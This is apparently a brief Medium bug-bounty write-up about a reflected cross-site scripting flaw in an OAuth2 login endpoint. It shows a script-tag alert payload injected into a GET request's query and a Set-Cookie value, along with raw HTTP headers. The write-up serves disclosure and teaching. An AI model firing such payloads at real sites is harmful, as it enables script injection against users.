Reflected XSS on a Public Program


Technical Analysis

&Set-Cookie: <script>alert(“Hacked By Deathstroke”)</script> <script>alert("Hacked By Deathstroke")</script>


GET /oauth2/login/? <script>alert("Hacked By Deathstroke")</script> HTTP/1.1 Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


<script>alert("Hacked By Deathstroke")</script> HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 
X-Frame-Options: SAMEORIGIN
Content-Length: 3982
Vary: Origin

Proof Of Concept




Security Researcher | Security Engineer | Security Nerd…

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Ever since I was a little boy, I have only ever wanted to be a Doctor.

Dart: Enum to String to Enum

Using Reviews, Analysis, and the Delphi Technique for Risk Identification

3 Recursion Myths You Need to Know

In-place Operations in PyTorch

Episode 222 Option Trading Strategies June 11, 2022

Clock Constraints — Part 2

20+ Recursion algorithms which asked frequently in interviews.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Naveen J

Naveen J

Security Researcher | Security Engineer | Security Nerd…

More from Medium

How We “Forced” Our Client To Fix A Low Severity Security Bug And Still Got Appreciated!

The Tale of a Click leading to RCE

The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems

How I could have read your confidential bug reports by simple mail?